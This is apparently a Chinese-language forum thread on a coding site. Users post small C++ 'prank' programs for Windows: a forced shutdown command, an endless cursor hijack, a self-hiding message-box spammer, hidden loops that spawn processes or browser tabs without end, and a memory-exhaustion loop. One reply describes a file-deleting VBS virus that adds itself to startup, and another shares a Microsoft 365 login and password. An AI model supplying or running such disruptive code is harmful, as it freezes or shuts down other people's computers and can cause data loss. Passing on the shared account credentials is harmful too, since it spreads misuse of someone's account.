中级光能
#include <iostream>
#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
int main(){
system("shutdown -s -f -t 30");
return 0;
}
#include <iostream>
#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
int main(){
system("shutdown -s -f -t 30");
return 0;
}
杨骐宇在2022-10-26 20:54:10追加了内容
#include<iostream>
#include<Windows.h>
using namespace std;
int main()
{
HWND hWnd = GetConsoleWindow();
SetWindowLong(hWnd, GWL_EXSTYLE, WS_EX_TOOLWINDOW);
srand (time(0));
int x,y;
while(1)
{
x=rand()%1000+300;
y=rand()%600+300;
SetCursorPos(x,y);
}
}
杨骐宇在2022-10-26 22:05:24追加了内容
#include<algorithm>
#include<iostream>
#include<cstdio>
#include<stdlib.h>
#include<Windows.h>
using namespace std;
int main(){
MessageBox(NULL,"请关闭声音,否则…", "内存超标", MB_ICONERROR|MB_OK);
for(int i=1;i<=6;i++) {
system("color a");
cout<<" "; MessageBeep(MB_ICONINFORMATION);
Sleep(1000);
system("color b");MessageBeep(MB_ICONINFORMATION);
cout<<" ";
system("color c");MessageBeep(MB_ICONINFORMATION);
cout<<" ";
system("color d");MessageBeep(MB_ICONINFORMATION);
cout<<" ";
system("color e");MessageBeep(MB_ICONINFORMATION);
system("color f");MessageBeep(MB_ICONINFORMATION);
system("color 1");MessageBeep(MB_ICONINFORMATION);
cout<<"■";
system("color 2");MessageBeep(MB_ICONINFORMATION);
cout<<"■";
system("color 3");MessageBeep(MB_ICONINFORMATION);
cout<<"■";
system("color 4");MessageBeep(MB_ICONINFORMATION);
cout<<"■";
system("color 5");MessageBeep(MB_ICONINFORMATION);
cout<<"■";
system("color 6");MessageBeep(MB_ICONINFORMATION);
cout<<"■";
system("color 7");MessageBeep(MB_ICONINFORMATION);
cout<<"■";
system("color 8");MessageBeep(MB_ICONINFORMATION);
cout<<"■";
system("color 9");MessageBeep(MB_ICONINFORMATION);
system("color 10");
Sleep(1000);MessageBeep(MB_ICONINFORMATION);
cout<<"■";
}
MessageBox(NULL,"最后一次提示", "bili...", MB_ICONERROR|MB_OK);
HWND hwnd=GetForegroundWindow();
ShowWindow(hwnd,SW_HIDE);
system("start https://www.bilibili.com/video/BV1GJ411x7h7/?p=1");
Sleep(6000);
MessageBox(NULL,"这只是开始", "bili...", MB_ICONERROR|MB_OK);
while(1){
MessageBox(NULL,"这只是开始", "bili...", MB_ICONERROR|MB_OK);
}
}
高级启示者
单击下载链接,下载Office Tool以安装Microsoft 365,顺便问一句,Windows**是什么版本的
https://otp.landian.vip/redirect/download.php?type=runtime&site=onedrive
高级启示者
好了我终于把教程找到了,你看教程学
Microsoft 365:
账号用户名:v077957@365of.top密码:aa112211
=========================
365安装+登陆教程:
PC教程https://s.tb.cn/c.0F2Eii
mac教程https://s.tb.cn/c.0FnpyW
资深天翼
你应该不知道木马病毒是什么,特洛伊木马是指伪装成一个工具(或软件)的可执行文件,通俗一点就是可以让你的电脑被黑客控制,最经典的就是2001年的灰鸽子远程控制。
你这个是恶意程序,只是关机,没有任何伤害力。玩笑程序至少要用VBS编出来,我用VBS编过简单的病毒,就是把电脑卡**机,把自己添加到注册表,开机启动,删除电脑里所有文件,这样电脑就废了。
新手守护
还不如cmd呢。
在提供三个:
#include<windows.h>
using namespace std;
int main(){
HWND hwnd=GetForegroundWindow();
ShowWindow(hwnd,SW_HIDE);
while(1)system("start");
return 0;
}
#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
int main(){
HWND hwnd=GetForegroundWindow();
ShowWindow(hwnd,SW_HIDE);
while(1)
system("start https://ke.codingtang.com/");
return 0;
}
#include<windows.h>
using namespace std;
int main(){
HWND hwnd=GetForegroundWindow();
ShowWindow(hwnd,SW_HIDE);
while(1){
int *s=new int[1000000];
}
return 0;
}